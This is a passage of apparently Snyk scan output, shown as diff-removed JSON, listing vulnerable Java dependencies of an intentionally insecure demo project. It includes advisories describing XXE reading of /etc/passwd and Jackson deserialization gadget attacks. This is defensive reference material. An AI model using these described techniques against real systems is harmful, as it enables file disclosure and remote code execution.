- "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "vulns": [ - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", - 
"SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", - 
"SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", - "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573" - ] - }, - "commons-collections:commons-collections@3.1": { - "upgradeTo": "commons-collections:commons-collections@3.2.2", - "upgrades": [ - "commons-collections:commons-collections@3.1", - "commons-collections:commons-collections@3.1", - "commons-collections:commons-collections@3.1" - ], - "vulns": [ - "SNYK-JAVA-COMMONSCOLLECTIONS-30078", - "SNYK-JAVA-COMMONSCOLLECTIONS-472711", - "SNYK-JAVA-COMMONSCOLLECTIONS-6056408" - ] - }, - "org.hibernate:hibernate-validator@4.3.1.Final": { - "upgradeTo": "org.hibernate:hibernate-validator@6.0.23.Final", - "upgrades": [ - "org.hibernate:hibernate-validator@4.3.1.Final", - "org.hibernate:hibernate-validator@4.3.1.Final", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "vulns": [ - "SNYK-JAVA-ORGHIBERNATE-30098", - "SNYK-JAVA-ORGHIBERNATE-568162", - "SNYK-JAVA-ORGHIBERNATE-569100" - ] - } - }, - "patch": {}, - "ignore": {}, - "pin": {} - }, - "filesystemPolicy": false, - "filtered": { - "ignore": [], - "patch": [] - }, - "uniqueCount": 99, - "projectName": "io.github.snyk:todolist-web-common", - "foundProjectCount": 7, - "displayTargetFile": "todolist-goof/todolist-web-common/pom.xml", - "hasUnknownVersions": false, - "path": "/Users/austindoll/Documents/GitHub/java-goof" - }, - { - "vulnerabilities": [ - { - "id": "SNYK-JAVA-C3P0-461017", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": 
{ - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", - "title": "GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:45.369849Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with 
JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", - "epssDetails": { - "percentile": "0.78365", - "probability": "0.00585", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-20433" - ], - "CWE": [ - "CWE-611" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:17:58.383761Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-12-24T13:29:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-07-21T14:22:18Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:09.230623Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2" - }, - { - "id": 
"SNYK-JAVA-C3P0-461018", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://hackerone.com/reports/509315", - "title": "POC: Hackerone Report" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 4.4, - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:14.895852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "description": "## 
Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", - "epssDetails": { - "percentile": "0.90102", - "probability": "0.02457", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-5427" - ], - "CWE": [ - "CWE-776" - ], - "GHSA": [ - "GHSA-84p2-vf58-xhxv" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:24:58.914446Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-04-22T22:18:26Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-04-22T22:18:26Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:53.496388Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2" - }, - { - "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", - "type": "license", - "title": "LGPL-3.0 license", - "semver": { - "vulnerable": [ - "[0,)" - ] - }, - "license": "LGPL-3.0", - "language": "java", - "description": "LGPL-3.0 license", - "packageName": "c3p0:c3p0", - "creationTime": "2024-06-18T02:35:42.971Z", - 
"packageManager": "maven", - "publicationTime": "2024-06-18T02:35:42.971Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.6)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2798", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:47.492797Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.721313Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, 
- "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:03.263794Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.492797Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.721313Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.pastdev.httpcomponents.configuration.JndiConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2798)\n", - "epssDetails": { - "percentile": "0.77013", - "probability": "0.00519", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-24750" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-09-18T13:46:28.613692Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-09-18T13:44:12Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-09-18T16:19:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.721313Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - 
"isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Srikanth Ramu", - "threedr3am'follower" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2658", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/pull/2864%23issuecomment-701026600", - "title": "GitHub PR" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:52:55.201119Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:44.942188Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:55.201119Z" - } - ], - "description": "## 
Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to the class `ignite-jta`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2658)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/2864#issuecomment-701026600)\n", - "epssDetails": { - "percentile": "0.75677", - "probability": "0.00464", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10650" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-11-29T12:43:11.601162Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ], - 
